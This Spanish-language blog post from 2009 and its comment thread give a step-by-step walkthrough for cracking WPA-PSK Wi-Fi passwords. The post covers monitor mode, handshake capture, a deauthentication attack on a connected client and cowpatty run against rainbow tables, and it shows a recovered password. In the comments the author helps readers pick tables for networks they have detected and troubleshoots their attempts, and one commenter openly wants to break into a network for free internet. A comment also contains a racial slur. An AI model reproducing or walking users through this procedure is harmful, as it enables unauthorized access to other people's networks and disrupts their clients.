Como Crackear una WPA con Rainbows Tables

Bueno el primer procesdimiento es mirar como se llama nuestra tarjeta de red inalambrica con el siguiente comando

#iwconfig

iwconfig1

En la imagen anterior podemos ver el nombre de mi tarjeta de red inlambrica es wlan0

ahora lo pondremos la tarjeta en modo monitor con los siguintes dos comandos

#airmon-ng stop wlan0

#airmon-ng start wlan0

airmon2

Debe aparecer algo similar como en la imagen anterior

ahora vamos a escanear las redes que estan a nuestro alcance

#airodum-ng wlan0

airodum29

En la imagen anterior podemos ver que a nuestro alcance hay un red wireles que tiene un tipo de encriptacion WPA-TKIP vamos anotar la MAC (BSSID) el nombre (ESSID) y el canal (CH)

Ahora usaremos airodum-ng para capturar el handshake

#airodump-ng –c 1 –bssid 00:A0:56:9A:18:FB –w prueba wlan0

Como vemos en la imagen anterior vemos que en el AP hay un cliente asociado entonces vamos hacerle una desautenticacion al cliente que tiene conectado para nosotros poder capturar el handshake

#aireplay-ng -0 1 -a 00:0A:56:9A:18:FB -c 00:17:C4:32:A4:8D wlan0

En la parte superior de la imagen vemos que obtuvimos el handshake
Ahora procedemos a crackear la contraseña con el siguiente comando

#cowpatty -d /media/wpa_psk-h1kari_renderman/wpa_tables/xah-0/Thomson -r prueba-01.cap -s Thomson

airodum6

En la imagen anterior podemos ver la velocidad de crackeo de una red con WPA y la password es JONATHAN

NOTA:

Para poder crackear la contraseña el SSID debe de ser el mismo de las Rainbows Tables me explico si el SSID es por ejemplo thomson y en las Rainbows Tables es Thomson no puede descifrar la contraseña.

En el siguinte link pueden descargar las Rainbows Tables y encontrar mas información

http://hak5.org/forums/index.php?showtopic=12708%3Cbr%3E

Toda la información aquí expuesta es para uso educativo y/o científico. Todo lo que hagas con estos programas es responsabilidad tuya.

This entry was posted on septiembre 17, 2009 at 7:31 pm and is filed under Wifi. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

22 respuestas to “Como Crackear una WPA con Rainbows Tables”

Fercho Says:
septiembre 26, 2009 a 1:05 am

Buen post, ahora solo necesitamos un cluster para precomputar unos SSIDs colombianos 😉

Responder
ainhoa Says:
abril 8, 2010 a 7:41 am

hola tengo un problema empezado a intalar el programa batrark perdona por omerme letras pero estoy on el virtual linux q es donde lo tengo y no me deja esribir esa letra espero q lo entiendas mi problema es q pongo el primer omando y no me reonoe mi tarjeta Atheros AR 9285 eh busado en todos los foros pero nadie sabe nada a ver si me puedes deir a ver omo haer para q la reonoza o algo porq me estoy volviendo loa puede ser porq esta metido en un virtual el programa o porq linux no tiene los drivers a ver si me puedes dar alguna idea por favor

Responder
- waldoredes Says:
  abril 10, 2010 a 8:40 am
  
  Hola si tienes una atheros en usb podes usar la maquina virtual pero si es PCI o PCI E tenes que iniciar linux desde tu maquina real y si tu linux que iniciastes no tiene instalado el driver entonces te paso el link para que tu lo instales
  http://linuxwireless.org/en/users/Drivers/ath9k
  Lo que tengo entendido es que apartir del kernel 2.6.29 tiene soporte para esta tarjeta cuando instales esto ya podras seguir el manual de como romper una red wifi.
  
  Espero que te sirva si tienes alguna duda comentas.
  
  Responder
  - ainhoa Says:
    abril 10, 2010 a 3:39 pm
    
    hola gracias la verda q se bastante poco de todo esto voy a seguir leyendo cosas porq tube q desistalar todo ya q no lo consguia y ademas soy super principiante en linux no tengo ni idea de como se instala los drivers ya te comentare gracias por tu respuesta ya q eres el unico q me a dicho algo porq sobre mi problema mucha gente pregunta pero nadie dice nada
ainhoa Says:
abril 10, 2010 a 5:07 pm

hola me da un error me gustaria mandarte una foto porq es q ya no se q puedo hacer a ver si me puedes ayudar por favor

Responder
ainhoa Says:
abril 11, 2010 a 3:31 pm

hola sigo tiendo problemas consigo q me deje conectarme a mi linea en linux pero no me dice el nombre de mi tarjeta me sale esto a ver si me puedes ayudar por favor

eth0 Link encap:Ethernet HWaddr 08:00:27:ea:b9:d7
inet addr:10.0.2.15 Bcast:10.0.2.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:feea:b9d7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4295 errors:56 dropped:0 overruns:0 frame:0
TX packets:1583 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5980675 (5.9 MB) TX bytes:117976 (117.9 KB)
Interrupt:10 Base address:0xd020

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:4 errors:0 dropped:0 overruns:0 frame:0
TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:200 (200.0 B) TX bytes:200 (200.0 B)

root@bt:~# idconfig
bash: idconfig: command not found
root@bt:~# idd
bash: idd: command not found
root@bt:~# iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

root@bt:~# airmon-ng stop ath0

Interface Chipset Driver

root@bt:~# airmon-ng start ath0

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
4954 dhclient

Interface Chipset Driver

root@bt:~#

Responder
- waldoredes Says:
  abril 12, 2010 a 11:45 am
  
  Descargate el dvd de bactrack 4 final desde la siguinte url
  http://www.backtrack-linux.org/download.php?fname=bt4f
  y lo inicias en livedvd y pruebas si tiene el driver incluido
  si tienes alguna duda comenta.
  
  Responder
roberto Says:
abril 26, 2010 a 1:39 am

hola tengo una duda podras explicar de donde sacaste lo siguiente

#cowpatty -d /media/wpa_psk-h1kari_renderman/wpa_tables/xah-0/Thomson -r prueba-01.cap -s Thomson

-r seria nombre donde se capturan los archivos
-s es el essid sino me equivoco
pero
-d EN ESTA ES NOSE DE DONDE LO SACAS

Responder
- waldoredes Says:
  abril 26, 2010 a 8:57 am
  
  hola
  la opcion -d es para especificar el directorio de las Rainbows Tables
  
  Responder
Christian Says:
May 7, 2010 a 8:06 pm

Hola amigo no entiendo eso de rainbows Tables me podrias exlicar un poco mas y como se que Rainbows Tables puedo descargar y de donde?

Responder
- waldoredes Says:
  May 7, 2010 a 9:03 pm
  
  Hola christian pues te paso un link donde puedes enterarte que es y como funciona.
  
  http://en.wikipedia.org/wiki/Rainbow_table
  
  Responder
Christian Says:
May 8, 2010 a 8:23 am

Hola amigo y como se que Rainbow Table tengo que descargar a mi me detecta varias redes con TKIP pero la verdad ni idea de como sacar el password aver si me das una amito 🙂 con esto.

Responder
- waldoredes Says:
  May 8, 2010 a 10:29 am
  
  Puedes mirar el SSID de las redes inalambricas y con base a ese nombre se descarga la Rainbow table que necesita.
  
  Ejemplo
  Si detectas una red con un SSID NETGEAR te descargas esta Rainbow Table
  
  http://www.megaupload.com/?d=R1BQTT1A
  
  Responder
Christian Says:
May 18, 2010 a 3:11 pm

Hola Amigos Disculpa por no aver respondido antes estuve ocupado estos dias pues mira te paso una imagen del scaneo de red y me dices cual Rainbow Table tengo que descargar 🙂 aqui la imagen

Responder
- waldoredes Says:
  May 18, 2010 a 6:53 pm
  
  Hola, viendo el pantallazo que me enviastes veo una red con SSID WIFI descargate esta table rainbows tables http://www.megaupload.com/?d=3SPD7D46
  y una recomendacion es filtrar del pantallazo informacion sensible como es la direccion MAC, SSID.
  
  Responder
Christian Says:
May 18, 2010 a 8:02 pm

Y para el de Kevin no hay?

Responder
- waldoredes Says:
  May 18, 2010 a 9:01 pm
  
  noooooooooo
  
  Responder
Christian Says:
junio 28, 2010 a 9:22 am

waldoredes bro encontre el raimbows

pero dime #cowpatty -d /media/wpa_psk-h1kari_renderman/wpa_tables/xah-0/Thomson -r prueba-01.cap -s Thomson

es la ubicacion de la rambor seria haci

#cowpatty -d /Escritorio/wap/Kevin -r prueba-01.cap -s Kevin

me supongo?

otra consulta sobre esto:

#aireplay-ng -0 1 -a 00:0A:56:9A:18:FB -c 00:17:C4:32:A4:8D wlan0

y si esa red tiene varios cliente como se hace?

Responder
Christian Says:
junio 28, 2010 a 2:05 pm

aireplay-ng -0 1 -a 00:02:6F:6C:9F:E9 -c 00:1B:11:20:F0:07 wlan0
14:04:23 Waiting for beacon frame (BSSID: 00:02:6F:6C:9F:E9) on channel 1
14:04:24 Sending 64 directed DeAuth. STMAC: [00:1B:11:20:F0:07] [ 0| 0 ACK

me sigue sin salir el handshake :S

CH 1 ][ Elapsed: 3 mins ][ 2010-06-28 14:05

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E

00:02:6F:6C:9F:E9 -57 100 1570 556 0 1 11 . WPA TKIP PSK K

BSSID STATION PWR Rate Lost Packets Probes

00:02:6F:6C:9F:E9 00:1B:11:20:F0:07 -91 11 – 1 0 1

Responder
Como habilitar el modo monitor en BCM4312 « ADMINISTRACION DE REDES Says:
julio 29, 2010 a 1:44 pm

[…] Ataque WPA Rainbows Tables […]

Responder
daniel Says:
octubre 24, 2012 a 4:07 pm

Hola negro inmundo no he podido hackear una WPA2-psk
y necesito internet.. enseñame enviame un correo con el manuel y con un diccionario full. para hacerlo en el bactrack.

Responder
Jean Says:
enero 1, 2013 a 3:11 pm

It’s amazing in favor of me to have a site, which is useful in support of my know-how. thanks admin

Responder